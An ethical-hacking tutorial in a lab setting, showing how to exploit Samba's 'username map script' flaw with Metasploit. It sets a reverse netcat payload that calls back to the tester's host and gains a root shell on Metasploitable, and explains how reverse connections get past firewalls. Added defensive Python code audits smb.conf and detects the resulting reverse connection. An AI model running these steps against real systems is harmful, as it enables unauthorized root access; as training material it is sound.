Exploiting a Code Execution Vulnerability

In this section, we will explore more advanced uses of Metasploit by exploiting a code execution vulnerability in a specific service to gain full access to the target computer. After identifying the Samba server version 3.X on port 139 using Nmap, we searched for Samba 3.X exploits on Google and found the “username map script” exploit on Rapid7. This exploit, named “exploit/multi/samba/usermap_script,” allows for command execution. We will follow the same process as in the previous section, as seen in the screenshot.

[Screenshot: exploiting-a-code-execution-vulnerability]

To start, we will launch Metasploit by running the command “msfconsole” in our console. Once we have launched Metasploit, we will use the command “use” followed by the name of the exploit that we want to use, which in this case is “exploit/multi/samba/usermap_script”. Next, we will run the “show options” command to see the options that we need to set before running the exploit. The complete command will be “use exploit/multi/samba/usermap_script” followed by “show options”.

[Screenshot: exploiting-a-code-execution-vulnerability2]

The process of using exploits is generally the same; the only variation is the set of options each exploit exposes. We start with the “use” command followed by the exploit name, then run “show options” to see which options we need to configure for the exploit to work. Finally, once the desired options are set, we launch the exploit with the “exploit” command.

To set up RHOST, which is the IP of the target computer, we use the same method as in the previous section. We use the set command to set the RHOST option to the IP of the target computer, which is 10.0.2.4. After setting the option, we run the show options command to verify that RHOST has been set correctly, which is shown in the following screenshot.

[Screenshot: exploiting-a-code-execution-vulnerability3]

In contrast to the previous section, where we relied on a pre-installed backdoor on the target computer, this section targets a normal program with a code execution vulnerability and buffer overflow. Unlike the backdoor, this program has no built-in code to run Linux commands. Instead, it has a specific flaw that lets us run a small piece of code called a payload. To exploit the vulnerability and gain access, we create a payload and have the target computer execute it; the payload then lets us perform various actions on the target.
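The option this exploit abuses is Samba's “username map script” setting in smb.conf, so the first thing a defender checks on a Samba host is whether that option is enabled. The following audit script is an added example, not part of the original tutorial: it parses a constructed smb.conf fragment and flags the option wherever it appears (removing the option from smb.conf removes the exposure).

```python
import re

# Constructed smb.conf fragment for illustration; not taken from the page or any real host.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   ; this option hands user-supplied names to a shell script
   username map script = /etc/samba/scripts/mapusers.sh
   log file = /var/log/samba/log.%m

[homes]
   browseable = no
"""

# Options a defender wants flagged; the exploit in this tutorial abuses the first one.
RISKY_OPTIONS = {"username map script"}


def normalize_key(key):
    """smb.conf ignores case and internal whitespace in option names."""
    return " ".join(key.split()).lower()


def parse_smb_conf(text):
    """Parse smb.conf text into {section: {option: value}}, skipping comments."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][normalize_key(key)] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return one finding string per risky option found, in file order."""
    findings = []
    for section, options in parse_smb_conf(text).items():
        for option, value in options.items():
            if option in RISKY_OPTIONS:
                findings.append(f"[{section}] {option} = {value}")
    return findings
```

Run `audit_smb_conf(open("/etc/samba/smb.conf").read())` on a host to get the list of findings; an empty list means the option is not configured.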

In the future, we will explore different types of payloads that can allow us to execute Linux commands. To view the available payloads that can be used with a specific exploit, we can use the “show payloads” command. There are various types of payloads that we can utilize, as depicted in the accompanying screenshot.

[Screenshot: exploiting-a-code-execution-vulnerability4]

After the vulnerability is exploited, the payload, a small piece of code, is executed on the target computer, and the payload we choose determines what action is performed. As seen in the screenshot, the available payloads are all command-line payloads that let us execute Linux commands on the target. Note that these payloads are listed because our target is a Linux machine; they only work on Unix-like systems.

There are primarily two types of payloads that we can use, namely Bind payloads and Reverse payloads.

  • Bind payloads function by opening a port on the target computer, enabling us to connect to that port and execute commands.
  • Reverse payloads, on the other hand, work in the opposite way. They open a port on our machine and then establish a connection from the target computer to our machine. This approach can be particularly advantageous in situations where firewalls are in place. Since firewalls typically filter any incoming connections to the target machine, the reverse payload can help bypass such restrictions. By having the target machine initiate the connection to our machine, we can circumvent the firewall restrictions and execute the necessary commands.

We will use the cmd/unix/reverse_netcat payload. The last part of a payload name indicates the language or tool used to make the connection: in the previous screenshot there are payloads written in Perl, PHP, Python and Ruby, and others based on Netcat, a tool for establishing connections between computers. We select the payload the same way we set the exploit options, with the “set” command. The command would be “set PAYLOAD cmd/unix/reverse_netcat”, as shown in the screenshot:

[Screenshot: exploiting-a-code-execution-vulnerability5]

Setting a payload follows the same process as setting an option. After selecting it, we run “show options” again, because a payload usually brings additional options of its own. For example, in the screenshot there is now an option called “LHOST”, the listening host, i.e. our own address. This option must be set correctly for the target machine to connect back to us.

[Screenshot: exploiting-a-code-execution-vulnerability6]

To find our own IP address, we run the “ifconfig” command; in this case the address is 10.0.2.15, as shown in the screenshot.

[Screenshot: exploiting-a-code-execution-vulnerability7]

To set the LHOST, we use the same process as for the RHOST: the “set” command, followed by the name of the option and the value we want to assign. In this instance we set the LHOST to 10.0.2.15, so the command is “set LHOST 10.0.2.15”.

[Screenshot: exploiting-a-code-execution-vulnerability8]

To confirm the setup, we can run “ifconfig” once more to check that our own IP address is indeed 10.0.2.15, and then run the “show options” command. In the screenshot, we can see that all the required options are set correctly.

[Screenshot: exploiting-a-code-execution-vulnerability9]

In the current exploit scenario, we have set the RHOST to 10.0.2.4 and the LHOST to 10.0.2.15, which is the desired configuration. We can additionally specify the port on which our computer will listen for the connection.

Choosing port 80 could be advantageous because it is typically not filtered by firewalls, as web browsers use this port. By setting the LPORT to 80, the target computer will attempt to connect to us through that port, and the firewall will likely allow it. However, in this specific scenario, we cannot use port 80, as we already have a web server running on that port.

Therefore, we will set the LPORT to 5555, similar to how we set the LHOST. After executing the “show options” command, we can confirm that the port has been updated to 5555, as depicted in the screenshot.

[Screenshot: exploiting-a-code-execution-vulnerability10]

Next, we will execute the exploit command to initiate the exploit. As shown in the screenshot below, we can see that session 1 has been established, and the connection is between our device, 10.0.2.15:5555, and the target device, 10.0.2.4:48184.

[Screenshot: exploiting-a-code-execution-vulnerability11]
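From the defender's side, the session just established (the target's 10.0.2.4:48184 connected out to our listener at 10.0.2.15:5555) is exactly what a host-based check on the Samba server should catch: a descendant of smbd holding an outbound connection, or smbd itself talking on something other than its own service port. The following is an added example, not code from the tutorial; the process table and socket records are constructed to mirror the scenario above.

```python
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid comm")
Conn = namedtuple("Conn", "pid laddr lport raddr rport state")

# Constructed records for a Samba host in the page's scenario: smbd has spawned
# sh -> nc, and nc holds the reverse connection to 10.0.2.15:5555. Illustrative only.
PROCS = [
    Proc(1, 0, "init"),
    Proc(1200, 1, "smbd"),
    Proc(1201, 1200, "smbd"),   # per-client smbd child
    Proc(1310, 1201, "sh"),     # shell spawned by the injected command
    Proc(1311, 1310, "nc"),     # netcat holding the reverse connection
    Proc(900, 1, "sshd"),
]
CONNS = [
    Conn(1201, "10.0.2.4", 139, "10.0.2.15", 51000, "ESTABLISHED"),   # normal SMB session
    Conn(1311, "10.0.2.4", 48184, "10.0.2.15", 5555, "ESTABLISHED"),  # reverse shell
    Conn(900, "10.0.2.4", 22, "10.0.2.15", 52000, "ESTABLISHED"),     # unrelated SSH session
]

SMB_PORTS = {139, 445}


def ancestry(pid, procs):
    """Command names from pid up to the root, e.g. ['nc', 'sh', 'smbd', 'smbd', 'init']."""
    by_pid = {p.pid: p for p in procs}
    chain = []
    while pid in by_pid:
        proc = by_pid[pid]
        chain.append(proc.comm)
        if proc.ppid == pid:   # guard against a self-parented root entry
            break
        pid = proc.ppid
    return chain


def find_smbd_reverse_connections(procs, conns):
    """Flag established sockets owned by smbd descendants, or by smbd on a non-SMB port."""
    findings = []
    for conn in conns:
        if conn.state != "ESTABLISHED":
            continue
        chain = ancestry(conn.pid, procs)
        if "smbd" not in chain:
            continue
        if chain[0] == "smbd" and conn.lport in SMB_PORTS:
            continue   # smbd serving a client on its own port is expected
        findings.append((conn.pid, "/".join(reversed(chain)), f"{conn.raddr}:{conn.rport}"))
    return findings
```

On a live host the same records can be built from the process list and the established TCP sockets; the legitimate SMB session on port 139 is skipped while the nc child is reported with its full process chain.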

To evaluate our current status, we will execute some commands. Firstly, we will use the “pwd” command to display the current directory. Then, we will use the “id” command to check our user identity, which should indicate that we are logged in as the root user.

Using the “uname -a” command, we can confirm that we are running on the Metasploitable machine. We can also use the “ls” command to list the files and directories in the current directory, among other things.

It is important to note that we can employ any Linux command in this context, as we did in the previous section.

[Screenshot: exploiting-a-code-execution-vulnerability12]

We hope this article has helped you understand the details of exploiting a code execution vulnerability. For more on Ethical Hacking, follow us at tutorials.freshersnow.com.